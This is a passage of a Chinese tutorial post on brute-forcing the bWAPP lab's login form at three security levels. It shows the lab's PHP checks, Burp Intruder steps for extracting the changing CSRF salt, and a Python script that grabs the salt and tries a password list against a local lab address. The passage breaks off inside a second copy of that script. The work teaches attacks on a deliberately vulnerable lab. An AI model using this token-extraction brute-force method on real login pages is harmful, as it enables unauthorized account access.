{"id":90209,"date":"2026-08-04T19:49:52","date_gmt":"2026-08-04T11:49:52","guid":{"rendered":"https:\/\/www.wsisp.com\/helps\/90209.html"},"modified":"2026-08-04T19:49:52","modified_gmt":"2026-08-04T11:49:52","slug":"%e9%9b%b6%e5%9f%ba%e7%a1%80%e7%8e%a9%e8%bd%acbwapp%e9%9d%b6%e5%9c%ba%ef%bc%88%e4%b8%89%e5%8d%81%e5%85%ad%ef%bc%89%ef%bc%9abroken-auth-password-attacks","status":"publish","type":"post","link":"https:\/\/www.wsisp.com\/helps\/90209.html","title":{"rendered":"\u96f6\u57fa\u7840\u73a9\u8f6cbWAPP\u9776\u573a\uff08\u4e09\u5341\u516d\uff09\uff1aBroken Auth. - Password Attacks"},"content":{"rendered":"<p>\u6458\u8981&#xff1a;\u8fd9\u662f bWAPP \u7cfb\u5217\u7b2c\u4e09\u5341\u516d\u7bc7&#xff0c;\u805a\u7126\u4e8e Broken Auth. &#8211; Password Attacks&#xff08;\u5bc6\u7801\u653b\u51fb&#xff09;\u3002\u8fd9\u4e00\u5173\u6f14\u793a\u4e86\u4e09\u79cd\u5b89\u5168\u7ea7\u522b\u4e0b&#xff0c;\u767b\u5f55\u8868\u5355\u5bf9\u66b4\u529b\u7834\u89e3\u7684\u9632\u62a4\u80fd\u529b&#xff1a;Low \u7ea7\u522b\u65e0\u4efb\u4f55\u9632\u62a4&#xff0c;\u53ef\u4ee5\u76f4\u63a5\u7528 Burp \u66b4\u529b\u7834\u89e3&#xff1b;Medium \u7ea7\u522b\u52a0\u5165\u4e86 CSRF Token&#xff08;\u9690\u85cf salt \u5b57\u6bb5&#xff09;&#xff0c;\u9700\u8981\u52a8\u6001\u63d0\u53d6 token \u624d\u80fd\u7834\u89e3&#xff1b;High \u7ea7\u522b\u52a0\u5165\u4e86\u9a8c\u8bc1\u7801&#xff0c;\u8ba9\u81ea\u52a8\u5316\u653b\u51fb\u53d8\u5f97\u56f0\u96be\u3002\u6587\u7ae0\u4f1a\u5206\u6790\u4e09\u79cd\u7ea7\u522b\u7684\u9632\u62a4\u673a\u5236&#xff0c;\u6f14\u793a\u5982\u4f55\u7528 Burp \u7ed5\u8fc7\u8fd9\u4e9b\u9632\u62a4\u3002\u9644\u771f\u5b9e\u6848\u4f8b\u3002<\/p>\n<hr \/>\n<h3 style=\"background-color:transparent\">\u4e00\u3001\u627e\u76ee\u6807<\/h3>\n<table>\n<tr>\u76ee\u6807\u8bf4\u660e<\/tr>\n<tbody>\n<tr>\n<td>\u653b\u51fb\u9762<\/td>\n<td>\u767b\u5f55\u8868\u5355&#xff08;\u5bc6\u7801\u7206\u7834&#xff09;<\/td>\n<\/tr>\n<tr>\n<td>Low \u7ea7\u522b\u9632\u62a4<\/td>\n<td>\u65e0\u2014\u2014\u53ef\u76f4\u63a5\u66b4\u529b\u7834\u89e3<\/td>\n<\/tr>\n<tr>\n<td>Medium \u7ea7\u522b\u9632\u62a4<\/td>\n<td>CSRF Token&#xff08;\u9690\u85cf salt \u5b57\u6bb5&#xff09; \u2014\u2014\u9700\u8981\u52a8\u6001\u63d0\u53d6<\/td>\n<\/tr>\n<tr>\n<td>High \u7ea7\u522b\u9632\u62a4<\/td>\n<td>CAPTCHA&#xff08;\u9a8c\u8bc1\u7801&#xff09; \u2014\u2014\u9700\u8981\u624b\u52a8\u6216 OCR \u8bc6\u522b<\/td>\n<\/tr>\n<tr>\n<td>\u6700\u7ec8\u76ee\u6807<\/td>\n<td>\u901a\u8fc7\u66b4\u529b\u7834\u89e3\u83b7\u53d6\u6709\u6548\u5bc6\u7801<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<hr \/>\n<h3>\u4e8c\u3001\u524d\u8a00&#xff1a;\u66b4\u529b\u7834\u89e3<\/h3>\n<p>\u66b4\u529b\u7834\u89e3&#xff08;Brute Force Attack&#xff09;\u5c31\u662f\u7528\u5927\u91cf\u5bc6\u7801\u53cd\u590d\u5c1d\u8bd5\u767b\u5f55&#xff0c;\u76f4\u5230\u627e\u5230\u6b63\u786e\u7684\u90a3\u4e00\u4e2a\u3002<\/p>\n<p>\u9632\u5fa1\u66b4\u529b\u7834\u89e3\u901a\u5e38\u6709\u4e09\u79cd\u624b\u6bb5&#xff1a;<\/p>\n<ul>\n<li>\n<p>\u9650\u5236\u5c1d\u8bd5\u6b21\u6570\u2014\u2014\u8fde\u7eed\u8f93\u9519\u51e0\u6b21\u540e\u9501\u5b9a\u8d26\u6237<\/p>\n<\/li>\n<li>\n<p>CSRF Token\u2014\u2014\u6bcf\u6b21\u8bf7\u6c42\u90fd\u5fc5\u987b\u643a\u5e26\u4e00\u4e2a\u968f\u673a\u7684 token&#xff0c;\u9632\u6b62\u81ea\u52a8\u5316\u5de5\u5177\u91cd\u590d\u63d0\u4ea4<\/p>\n<\/li>\n<li>\n<p>\u9a8c\u8bc1\u7801&#xff08;CAPTCHA&#xff09;\u2014\u2014\u8ba9\u6bcf\u6b21\u767b\u5f55\u90fd\u9700\u8981\u4eba\u5de5\u8bc6\u522b\u56fe\u7247\u5185\u5bb9<\/p>\n<\/li>\n<\/ul>\n<p>\u8fd9\u4e00\u5173\u7684\u4e09\u4e2a\u7ea7\u522b\u6b63\u597d\u5bf9\u5e94\u4e86\u8fd9\u4e09\u79cd\u9632\u5fa1\u7684\u201c\u7f3a\u5931\u201d\u548c\u201c\u5b58\u5728\u201d\u3002<\/p>\n<p>Low \u7ea7\u522b&#xff1a;\u6ca1\u6709\u9632\u62a4&#xff0c;\u53ef\u4ee5\u76f4\u63a5\u7206\u7834\u3002 Medium \u7ea7\u522b&#xff1a;\u52a0\u4e86 CSRF Token&#xff0c;\u4f46\u6bcf\u6b21\u9875\u9762\u5237\u65b0 token \u4f1a\u53d8\u5316&#xff0c;\u9700\u8981\u52a8\u6001\u63d0\u53d6\u3002 High \u7ea7\u522b&#xff1a;\u52a0\u4e86\u9a8c\u8bc1\u7801&#xff0c;\u9700\u8981\u8bc6\u522b\u9a8c\u8bc1\u7801\u624d\u80fd\u7206\u7834\u3002<\/p>\n<hr \/>\n<h3>\u4e09\u3001\u5173\u5361\u4ecb\u7ecd<\/h3>\n<h4>3.1 Low \u7ea7\u522b<\/h4>\n<ul>\n<li>\n<p>\u6587\u4ef6&#xff1a;ba_pwd_attacks_1.php<\/p>\n<\/li>\n<li>\n<p>\u9875\u9762&#xff1a;\u666e\u901a\u767b\u5f55\u6846&#xff0c;\u63d0\u793a\u8d26\u53f7\u662f bee\/bug<\/p>\n<\/li>\n<li>\n<p>\u5bc6\u7801\u6846\u662f \u660e\u6587\u663e\u793a&#xff08;type&#061;&#034;text&#034;&#xff09;<\/p>\n<\/li>\n<li>\n<p>\u6ca1\u6709\u9632\u62a4&#xff0c;\u53ef\u4ee5\u76f4\u63a5\u7206\u7834<\/p>\n<\/li>\n<\/ul>\n<p><img loading=\"lazy\" decoding=\"async\" alt=\"\" height=\"870\" src=\"https:\/\/www.wsisp.com\/helps\/wp-content\/uploads\/2026\/08\/20260804114939-6a71d1d3d0497.png\" width=\"1920\" \/><\/p>\n<h4>3.2 Medium \u7ea7\u522b<\/h4>\n<ul>\n<li>\n<p>\u6587\u4ef6&#xff1a;ba_pwd_attacks_2.php<\/p>\n<\/li>\n<li>\n<p>\u9875\u9762&#xff1a;\u666e\u901a\u767b\u5f55\u6846&#xff0c;\u4f46\u5bc6\u7801\u6846\u662f type&#061;&#034;password&#034;&#xff08;\u9690\u85cf\u8f93\u5165&#xff09;<\/p>\n<\/li>\n<li>\n<p>\u6709\u4e00\u4e2a\u9690\u85cf\u5b57\u6bb5 salt&#xff0c;\u7528\u4e8e\u9632 CSRF<\/p>\n<\/li>\n<li>\n<p>\u6bcf\u6b21\u5237\u65b0\u9875\u9762&#xff0c;salt \u90fd\u4f1a\u53d8\u5316<\/p>\n<\/li>\n<\/ul>\n<p><img loading=\"lazy\" decoding=\"async\" alt=\"\" height=\"870\" src=\"https:\/\/www.wsisp.com\/helps\/wp-content\/uploads\/2026\/08\/20260804114940-6a71d1d4933ec.png\" width=\"1920\" \/><\/p>\n<h4>3.3 High \u7ea7\u522b<\/h4>\n<ul>\n<li>\n<p>\u6587\u4ef6&#xff1a;ba_pwd_attacks_4.php<\/p>\n<\/li>\n<li>\n<p>\u9875\u9762&#xff1a;\u591a\u4e86\u9a8c\u8bc1\u7801&#xff08;CAPTCHA&#xff09;\u8f93\u5165\u6846<\/p>\n<\/li>\n<li>\n<p>\u9a8c\u8bc1\u7801\u56fe\u7247\u5728 iframe \u4e2d\u52a0\u8f7d<\/p>\n<\/li>\n<li>\n<p>\u9700\u8981\u6b63\u786e\u8f93\u5165\u9a8c\u8bc1\u7801\u624d\u80fd\u767b\u5f55<\/p>\n<\/li>\n<\/ul>\n<p><img loading=\"lazy\" decoding=\"async\" alt=\"\" height=\"870\" src=\"https:\/\/www.wsisp.com\/helps\/wp-content\/uploads\/2026\/08\/20260804114941-6a71d1d554611.png\" width=\"1920\" \/><\/p>\n<hr \/>\n<h3>\u56db\u3001\u6e90\u7801\u5206\u6790<\/h3>\n<h4>4.1 Low \u7ea7\u522b<\/h4>\n<p>$login &#061; $_POST[&#034;login&#034;];<br \/>\n$password &#061; $_POST[&#034;password&#034;];<br \/>\n\u200b<br \/>\nif($login &#061;&#061; $login &amp;&amp; $password &#061;&#061; $password)<br \/>\n{<br \/>\n \u00a0 \u00a0$message &#061; &#034;&lt;font color&#061;\\\\&#034;green\\\\&#034;&gt;Successful login!&lt;\/font&gt;&#034;;<br \/>\n}<br \/>\nelse<br \/>\n{<br \/>\n \u00a0 \u00a0$message &#061; &#034;&lt;font color&#061;\\\\&#034;red\\\\&#034;&gt;Invalid credentials!&lt;\/font&gt;&#034;;<br \/>\n}<\/p>\n<p>\u76f4\u63a5\u6bd4\u5bf9\u8d26\u53f7\u5bc6\u7801&#xff0c;\u6ca1\u6709\u4efb\u4f55\u9632\u62a4\u3002<\/p>\n<h4>4.2 Medium \u7ea7\u522b<\/h4>\n<p>if(isset($_SESSION[&#034;salt&#034;]) &amp;&amp; ($_POST[&#034;salt&#034;] &#061;&#061; $_SESSION[&#034;salt&#034;]))<br \/>\n{<br \/>\n \u00a0 \u00a0if($_POST[&#034;login&#034;] &#061;&#061; $login &amp;&amp; $_POST[&#034;password&#034;] &#061;&#061; $password)<br \/>\n \u00a0  {<br \/>\n \u00a0 \u00a0 \u00a0 \u00a0\/\/ \u767b\u5f55\u6210\u529f<br \/>\n \u00a0  }<br \/>\n \u00a0 \u00a0else<br \/>\n \u00a0  {<br \/>\n \u00a0 \u00a0 \u00a0 \u00a0$message &#061; &#034;Invalid credentials!&#034;;<br \/>\n \u00a0  }<br \/>\n}<br \/>\nelse<br \/>\n{<br \/>\n \u00a0 \u00a0$message &#061; &#034;Incorrect salt!&#034;;<br \/>\n}<br \/>\n\u200b<br \/>\n$salt &#061; random_string();<br \/>\n$_SESSION[&#034;salt&#034;] &#061; $salt;<\/p>\n<p>\u903b\u8f91&#xff1a;<\/p>\n<ul>\n<li>\n<p>\u6bcf\u6b21\u9875\u9762\u52a0\u8f7d&#xff0c;\u751f\u6210\u4e00\u4e2a\u968f\u673a salt&#xff0c;\u5b58\u5230 Session&#xff0c;\u5e76\u5728\u8868\u5355\u4e2d\u4f5c\u4e3a\u9690\u85cf\u5b57\u6bb5\u8f93\u51fa<\/p>\n<\/li>\n<li>\n<p>\u767b\u5f55\u65f6&#xff0c;\u9664\u4e86\u9a8c\u8bc1\u8d26\u53f7\u5bc6\u7801&#xff0c;\u8fd8\u8981\u9a8c\u8bc1 salt \u662f\u5426\u5339\u914d Session \u4e2d\u7684\u503c<\/p>\n<\/li>\n<li>\n<p>\u6bcf\u6b21\u5237\u65b0\u9875\u9762 salt \u90fd\u4f1a\u53d8\u5316&#xff0c;\u65e7\u7684 salt \u7acb\u5373\u5931\u6548<\/p>\n<\/li>\n<\/ul>\n<p>\u9632\u62a4\u539f\u7406&#xff1a;\u653b\u51fb\u8005\u7528 Burp Intruder \u53d1\u9001\u8bf7\u6c42\u65f6&#xff0c;\u5982\u679c\u6ca1\u6709\u66f4\u65b0 salt&#xff0c;\u670d\u52a1\u5668\u4f1a\u8fd4\u56de \u201cIncorrect salt!\u201d&#xff0c;\u65e0\u6cd5\u8fdb\u884c\u5bc6\u7801\u7206\u7834\u3002<\/p>\n<h4 style=\"background-color:transparent\">4.3 High \u7ea7\u522b<\/h4>\n<p>if(isset($_SESSION[&#034;captcha&#034;]) &amp;&amp; ($_POST[&#034;captcha_user&#034;] &#061;&#061; $_SESSION[&#034;captcha&#034;]))<br \/>\n{<br \/>\n \u00a0 \u00a0if($_POST[&#034;login&#034;] &#061;&#061; $login &amp;&amp; $_POST[&#034;password&#034;] &#061;&#061; $password)<br \/>\n \u00a0  {<br \/>\n \u00a0 \u00a0 \u00a0 \u00a0$message &#061; &#034;&lt;font color&#061;\\\\&#034;green\\\\&#034;&gt;Successful login!&lt;\/font&gt;&#034;;<br \/>\n \u00a0  }<br \/>\n \u00a0 \u00a0else<br \/>\n \u00a0  {<br \/>\n \u00a0 \u00a0 \u00a0 \u00a0$message &#061; &#034;&lt;font color&#061;\\\\&#034;red\\\\&#034;&gt;Invalid credentials!&lt;\/font&gt;&#034;;<br \/>\n \u00a0  }<br \/>\n}<br \/>\nelse<br \/>\n{<br \/>\n \u00a0 \u00a0$message &#061; &#034;&lt;font color&#061;\\\\&#034;red\\\\&#034;&gt;Incorrect CAPTCHA!&lt;\/font&gt;&#034;;<br \/>\n}<\/p>\n<p>\u903b\u8f91&#xff1a;<\/p>\n<ul>\n<li>\n<p>\u9a8c\u8bc1\u7801\u5b58\u50a8\u5728 $_SESSION[&#034;captcha&#034;] \u4e2d<\/p>\n<\/li>\n<li>\n<p>\u767b\u5f55\u65f6&#xff0c;\u5148\u9a8c\u8bc1\u9a8c\u8bc1\u7801\u662f\u5426\u6b63\u786e&#xff0c;\u518d\u9a8c\u8bc1\u8d26\u53f7\u5bc6\u7801<\/p>\n<\/li>\n<li>\n<p>\u9a8c\u8bc1\u7801\u6bcf\u6b21\u5237\u65b0\u9875\u9762\u90fd\u4f1a\u53d8\u5316&#xff08;\u548c\u4e0a\u4e00\u5173\u4e0d\u540c&#xff0c;\u8fd9\u4e00\u5173\u7684\u9a8c\u8bc1\u7801\u9a8c\u8bc1\u540e\u6ca1\u6709\u88ab\u9500\u6bc1&#xff09;<\/p>\n<\/li>\n<\/ul>\n<p>\u9632\u62a4\u539f\u7406&#xff1a;\u9a8c\u8bc1\u7801\u9700\u8981\u4eba\u5de5\u8bc6\u522b&#xff0c;\u81ea\u52a8\u5316\u5de5\u5177\u65e0\u6cd5\u76f4\u63a5\u63d0\u4ea4\u6b63\u786e\u7684\u9a8c\u8bc1\u7801\u3002<\/p>\n<hr \/>\n<h3>\u4e94\u3001Low \u7ea7\u522b\u2014\u2014\u65e0\u9632\u62a4\u7206\u7834<\/h3>\n<h4>5.1 \u51c6\u5907\u5de5\u4f5c<\/h4>\n<p>\u7528 Burp \u62e6\u622a\u767b\u5f55\u8bf7\u6c42&#xff1a;<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" alt=\"\" height=\"1030\" src=\"https:\/\/www.wsisp.com\/helps\/wp-content\/uploads\/2026\/08\/20260804114942-6a71d1d61bbc4.png\" width=\"1920\" \/><\/p>\n<h4>5.2 \u53d1\u9001\u5230 Intruder<\/h4>\n<ul>\n<li>\n<p>\u53f3\u952e \u2192 Send to Intruder<\/p>\n<\/li>\n<li>\n<p>\u8fdb\u5165 Positions \u6807\u7b7e&#xff0c;\u6807\u8bb0 password \u53c2\u6570\u4e3a payload \u4f4d\u7f6e&#xff1a;<\/p>\n<\/li>\n<li>\n<p>\u8fdb\u5165 Payloads \u6807\u7b7e&#xff0c;\u52a0\u8f7d\u5bc6\u7801\u5b57\u5178&#xff08;\u5982 rockyou.txt \u6216\u5e38\u7528\u5bc6\u7801\u5217\u8868&#xff09;<\/p>\n<\/li>\n<\/ul>\n<p><img loading=\"lazy\" decoding=\"async\" alt=\"\" height=\"1030\" src=\"https:\/\/www.wsisp.com\/helps\/wp-content\/uploads\/2026\/08\/20260804114942-6a71d1d6c6273.png\" width=\"1920\" \/><\/p>\n<h4>5.3 \u8fd0\u884c\u7206\u7834<\/h4>\n<p>\u70b9\u51fb Start Attack&#xff0c;\u89c2\u5bdf\u54cd\u5e94\u3002<\/p>\n<p>\u6b63\u786e\u7684\u5bc6\u7801\u662f bug&#xff0c;\u5f53\u5c1d\u8bd5 bug \u65f6&#xff0c;\u54cd\u5e94\u4e2d\u5305\u542b \u201cSuccessful login!\u201d\u3002<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" alt=\"\" height=\"1021\" src=\"https:\/\/www.wsisp.com\/helps\/wp-content\/uploads\/2026\/08\/20260804114943-6a71d1d7642c3.png\" width=\"1903\" \/><\/p>\n<h4>5.4 \u7ed3\u8bba<\/h4>\n<p>Low \u7ea7\u522b\u6ca1\u6709\u4efb\u4f55\u9632\u62a4&#xff0c;\u66b4\u529b\u7834\u89e3\u5b8c\u5168\u53ef\u884c\u3002<\/p>\n<hr \/>\n<h3>\u516d\u3001Medium \u7ea7\u522b\u2014\u2014CSRF Token \u7ed5\u8fc7<\/h3>\n<h4>6.1 \u5c1d\u8bd5\u76f4\u63a5\u7206\u7834<\/h4>\n<p>\u628a Medium \u7ea7\u522b\u7684\u8bf7\u6c42\u53d1\u9001\u5230 Intruder&#xff0c;\u76f4\u63a5\u7206\u7834\u5bc6\u7801\u3002<\/p>\n<p>\u7ed3\u679c&#xff1a;\u6bcf\u6b21\u54cd\u5e94\u90fd\u662f \u201cIncorrect salt!\u201d&#xff0c;\u56e0\u4e3a salt \u5df2\u7ecf\u5931\u6548\u4e86\u3002<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" alt=\"\" height=\"1021\" src=\"https:\/\/www.wsisp.com\/helps\/wp-content\/uploads\/2026\/08\/20260804114944-6a71d1d81a487.png\" width=\"1903\" \/><\/p>\n<h4>6.2 \u7406\u89e3\u9632\u62a4\u673a\u5236<\/h4>\n<p>Medium \u7ea7\u522b\u7684\u6bcf\u6b21\u8bf7\u6c42\u90fd\u5fc5\u987b\u643a\u5e26\u5f53\u524d\u6709\u6548\u7684 salt\u3002<\/p>\n<p>salt \u5728\u9875\u9762 HTML \u4e2d\u7684\u9690\u85cf\u5b57\u6bb5&#xff1a;<\/p>\n<p>&lt;input type&#061;&#034;hidden&#034; id&#061;&#034;salt&#034; name&#061;&#034;salt&#034; value&#061;&#034;abc123def456&#034; \/&gt;<\/p>\n<h4>6.3 \u7ed5\u8fc7\u65b9\u6cd5<\/h4>\n<h5>\u65b9\u6cd5\u4e00&#xff1a;\u624b\u5de5\u9010\u4e2a\u8bf7\u6c42<\/h5>\n<p>\u6bcf\u53d1\u4e00\u6b21\u8bf7\u6c42\u524d&#xff0c;\u5148\u8bbf\u95ee\u9875\u9762\u83b7\u53d6\u6700\u65b0\u7684 salt&#xff0c;\u7136\u540e\u624b\u52a8\u4fee\u6539\u8bf7\u6c42\u4e2d\u7684 salt \u503c\u3002\u8fd9\u79cd\u65b9\u6cd5\u6548\u7387\u6781\u4f4e&#xff0c;\u4e0d\u63a8\u8350\u3002<\/p>\n<h5>\u65b9\u6cd5\u4e8c&#xff1a;Burp \u7684 Grep Extractor \u914d\u5408 Intruder<\/h5>\n<ul>\n<li>\n<p>\u9996\u5148\u53d1\u9001\u4e00\u4e2a GET \u8bf7\u6c42\u83b7\u53d6\u767b\u5f55\u9875\u9762&#xff0c;\u4ece\u54cd\u5e94\u4e2d\u63d0\u53d6 salt \u503c<\/p>\n<\/li>\n<li>\n<p>\u7136\u540e\u7528\u8fd9\u4e2a salt \u503c\u6784\u9020 POST \u8bf7\u6c42<\/p>\n<\/li>\n<\/ul>\n<h6>\u8be6\u7ec6\u6b65\u9aa4<\/h6>\n<p>\u7b2c\u4e00\u6b65&#xff1a;\u6293\u53d6\u767b\u5f55\u8bf7\u6c42<\/p>\n<p>\u5728\u9875\u9762&#xff0c;\u8f93\u5165\u4efb\u610f\u7528\u6237\u540d\u548c\u5bc6\u7801&#xff0c;\u7528Burp Suite\u6293\u5305\u3002<\/p>\n<p>\u7b2c\u4e8c\u6b65&#xff1a;\u53d1\u9001\u5230Intruder<\/p>\n<p>\u53f3\u952e \u2192 \u201cSend to Intruder\u201d\u3002<\/p>\n<p>\u7b2c\u4e09\u6b65&#xff1a;\u914d\u7f6e\u7206\u7834\u4f4d\u7f6e<\/p>\n<ul>\n<li>\n<p>\u8fdb\u5165 Intruder \u2192 Positions<\/p>\n<\/li>\n<li>\n<p>\u70b9\u51fb \u201cClear\u201d \u6e05\u9664\u6240\u6709\u6807\u8bb0<\/p>\n<\/li>\n<li>\n<p>\u4e3a password \u53c2\u6570\u6dfb\u52a0\u53d8\u91cf\u6807\u8bb0<\/p>\n<\/li>\n<li>\n<p>\u4e3a <font face=\"monospace\">salt<\/font>\u00a0\u53c2\u6570\u6dfb\u52a0\u53d8\u91cf\u6807\u8bb0<\/p>\n<\/li>\n<li>\n<p>\u653b\u51fb\u6a21\u5f0f\u9009\u62e9 Pitchfork&#xff08;\u8349\u53c9&#xff09;&#xff08;\u56e0\u4e3a\u9700\u8981\u5c06\u5bc6\u7801\u5b57\u5178\u4e0e\u52a8\u6001Token\u4e00\u4e00\u5bf9\u5e94&#xff09;<\/p>\n<\/li>\n<\/ul>\n<p><img loading=\"lazy\" decoding=\"async\" alt=\"\" height=\"1030\" src=\"https:\/\/www.wsisp.com\/helps\/wp-content\/uploads\/2026\/08\/20260804114944-6a71d1d8c2e59.png\" width=\"1920\" \/><\/p>\n<p>\u7b2c\u56db\u6b65&#xff1a;\u914d\u7f6ePayload<\/p>\n<ul>\n<li>\n<p>\u8fdb\u5165 Intruder \u2192 Payloads<\/p>\n<\/li>\n<li>\n<p>Payload set 1&#xff08;\u5bc6\u7801&#xff09;&#xff1a;\u52a0\u8f7d\u5bc6\u7801\u5b57\u5178<\/p>\n<\/li>\n<li>\n<p>Payload set 2&#xff08;salt&#xff09;&#xff1a;\u9009\u62e9 \u201cRecursive grep\u201d \u7c7b\u578b<\/p>\n<\/li>\n<\/ul>\n<p><img loading=\"lazy\" decoding=\"async\" alt=\"\" height=\"1030\" src=\"https:\/\/www.wsisp.com\/helps\/wp-content\/uploads\/2026\/08\/20260804114945-6a71d1d95eb00.png\" width=\"1920\" \/><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" alt=\"\" height=\"1030\" src=\"https:\/\/www.wsisp.com\/helps\/wp-content\/uploads\/2026\/08\/20260804114945-6a71d1d9ef2f9.png\" width=\"1920\" \/><\/p>\n<p>\u7b2c\u4e94\u6b65&#xff1a;\u914d\u7f6esalt\u63d0\u53d6\u89c4\u5219<\/p>\n<ul>\n<li>\n<p>\u8fdb\u5165 Intruder \u2192 Options \u2192 Grep &#8211; Extract<\/p>\n<\/li>\n<li>\n<p>\u70b9\u51fb \u201cAdd\u201d<\/p>\n<\/li>\n<\/ul>\n<p><img loading=\"lazy\" decoding=\"async\" alt=\"\" height=\"1030\" src=\"https:\/\/www.wsisp.com\/helps\/wp-content\/uploads\/2026\/08\/20260804114946-6a71d1da8cf95.png\" width=\"1920\" \/><\/p>\n<ul>\n<li>\n<p>\u5728\u54cd\u5e94\u5305\u4e2d\u627e\u5230 <font face=\"monospace\">salt<\/font>\u7684\u503c&#xff0c;\u914d\u7f6e\u6b63\u5219\u8868\u8fbe\u5f0f\u63d0\u53d6\u89c4\u5219<\/p>\n<\/li>\n<li>\n<p>\u8fd9\u6837Burp Suite\u5c31\u4f1a\u81ea\u52a8\u4ece\u6bcf\u4e2a\u54cd\u5e94\u4e2d\u63d0\u53d6\u65b0\u7684salt<\/p>\n<\/li>\n<\/ul>\n<p><img loading=\"lazy\" decoding=\"async\" alt=\"\" height=\"801\" src=\"https:\/\/www.wsisp.com\/helps\/wp-content\/uploads\/2026\/08\/20260804114947-6a71d1db295a6.png\" width=\"905\" \/><\/p>\n<p>\u7b2c\u516d\u6b65&#xff1a;\u914d\u7f6e\u8d44\u6e90\u6c60<\/p>\n<p>\u7531\u4e8eToken\u673a\u5236\u8981\u6c42\u4e32\u884c\u5904\u7406&#xff08;\u5fc5\u987b\u7b49\u4e0a\u4e00\u4e2a\u8bf7\u6c42\u5b8c\u6210\u3001\u83b7\u53d6\u65b0salt\u540e\u624d\u80fd\u53d1\u4e0b\u4e00\u4e2a\u8bf7\u6c42&#xff09;&#xff0c;\u9700\u8981&#xff1a;<\/p>\n<ul>\n<li>\n<p>\u8fdb\u5165 Intruder \u2192 Resource pool<\/p>\n<\/li>\n<li>\n<p>\u521b\u5efa\u65b0\u7684\u8d44\u6e90\u6c60&#xff0c;\u5c06\u6700\u5927\u5e76\u53d1\u6570\u8bbe\u4e3a1<\/p>\n<\/li>\n<\/ul>\n<p><img loading=\"lazy\" decoding=\"async\" alt=\"\" height=\"1030\" src=\"https:\/\/www.wsisp.com\/helps\/wp-content\/uploads\/2026\/08\/20260804114947-6a71d1db5c93d.png\" width=\"1920\" \/><\/p>\n<p>\u7b2c\u4e03\u6b65&#xff1a;\u8bbe\u7f6e\u521d\u59cbsalt\u503c<\/p>\n<p>\u5728 Payloads \u2192 Payload Options \u4e2d&#xff0c;\u5c06\u8ba9\u590d\u5236\u51fa\u6765\u7684\u521d\u59cbsalt\u503c\u586b\u5165 \u201cInitial payload for first request\u201d \u3002<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" alt=\"\" height=\"1030\" src=\"https:\/\/www.wsisp.com\/helps\/wp-content\/uploads\/2026\/08\/20260804114947-6a71d1dbec531.png\" width=\"1920\" \/><\/p>\n<p>\u7b2c\u516b\u6b65&#xff1a;\u5f00\u59cb\u7206\u7834<\/p>\n<p>\u70b9\u51fb \u201cStart Attack\u201d&#xff0c;\u7b49\u5f85\u7206\u7834\u5b8c\u6210\u3002<\/p>\n<p>\u7b2c\u4e5d\u6b65&#xff1a;\u5206\u6790\u7ed3\u679c<\/p>\n<p>\u901a\u8fc7\u54cd\u5e94\u957f\u5ea6\u7b5b\u9009\u51fa\u6210\u529f\u767b\u5f55\u7684\u8bf7\u6c42\u3002<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" alt=\"\" height=\"1021\" src=\"https:\/\/www.wsisp.com\/helps\/wp-content\/uploads\/2026\/08\/20260804114948-6a71d1dc888d7.png\" width=\"1903\" \/><\/p>\n<h5>\u65b9\u6cd5\u4e09&#xff1a;\u4f7f\u7528 Python \u811a\u672c<\/h5>\n<p>\/\/ \u7b80\u6d01\u7248<br \/>\nimport requests<br \/>\nfrom bs4 import BeautifulSoup<br \/>\n\/\/ \u4f7f\u7528\u524d\u9700\u8981\u4fee\u6539\u4e3a\u81ea\u5df1\u7684\u5730\u5740<br \/>\nurl_login &#061; &#034;http:\/\/10.0.0.149:4096\/login.php&#034;<br \/>\nurl_target &#061; &#034;http:\/\/10.0.0.149:4096\/ba_pwd_attacks_2.php&#034;<\/p>\n<p>session &#061; requests.Session()<\/p>\n<p># &#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;\u7b2c\u4e00\u6b65&#xff1a;\u767b\u5f55bWAPP&#xff0c;\u62ff\u5230\u6709\u6548Cookie&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;&#061;<br \/>\nlogin_data &#061; {<br \/>\n    &#034;login&#034;: &#034;bee&#034;,<br \/>\n    &#034;password&#034;: &#034;bug&#034;,<br \/>\n    &#034;form&#034;: &#034;submit&#034;<br \/>\n}<br \/>\nsession.post(url_login, data&#061;login_data)<\/p>\n<p># \u5bc6\u7801\u5b57\u5178<br \/>\npasswords &#061; [&#034;123&#034;, &#034;password&#034;, &#034;bug&#034;, &#034;admin&#034;]<\/p>\n<p>for pwd in passwords:<br \/>\n    # GET \u83b7\u53d6\u9875\u9762\u968f\u673asalt&#xff08;\u6b64\u65f6\u5e26\u6709\u767b\u5f55cookie&#xff0c;\u53ef\u4ee5\u6b63\u5e38\u8bbf\u95ee\u9875\u9762&#xff09;<br \/>\n    resp &#061; session.get(url_target)<br \/>\n    soup &#061; BeautifulSoup(resp.text, &#039;html.parser&#039;)<\/p>\n<p>    # \u8c03\u8bd5&#xff1a;\u5982\u679c\u62a5\u9519\u53d6\u6d88\u4e0b\u9762\u6ce8\u91ca\u67e5\u770b\u9875\u9762\u5185\u5bb9<br \/>\n    # print(resp.text)<\/p>\n<p>    salt_tag &#061; soup.find(&#039;input&#039;, {&#039;name&#039;: &#039;salt&#039;})<br \/>\n    if not salt_tag:<br \/>\n        print(&#034;\u672a\u627e\u5230salt\u8f93\u5165\u6846&#xff01;\u9875\u9762\u5f02\u5e38&#034;)<br \/>\n        break<\/p>\n<p>    salt &#061; salt_tag.get(&#039;value&#039;)<\/p>\n<p>    data &#061; {<br \/>\n        &#039;login&#039;: &#039;bee&#039;,<br \/>\n        &#039;password&#039;: pwd,<br \/>\n        &#039;salt&#039;: salt,<br \/>\n        &#039;form&#039;: &#039;submit&#039;<br \/>\n    }<br \/>\n    resp2 &#061; session.post(url_target, data&#061;data)<br \/>\n    if &#034;Successful login!&#034; in resp2.text:<br \/>\n        print(f&#034;Found password: {pwd}&#034;)<br \/>\n        break<\/p>\n<p>\/\/ \u6e05\u6670\u7248<br \/>\nimport requests<br \/>\nfrom bs4 import BeautifulSoup<\/p>\n<p># \u914d\u7f6e\u4fe1\u606f<br \/>\nurl_login &#061; &#034;http:\/\/10.0.0.149:4096\/login.php&#034;<br \/>\nurl_target &#061; &#034;http:\/\/10.0.0.149:4096\/ba_pwd_attacks_2.php&#034;<br 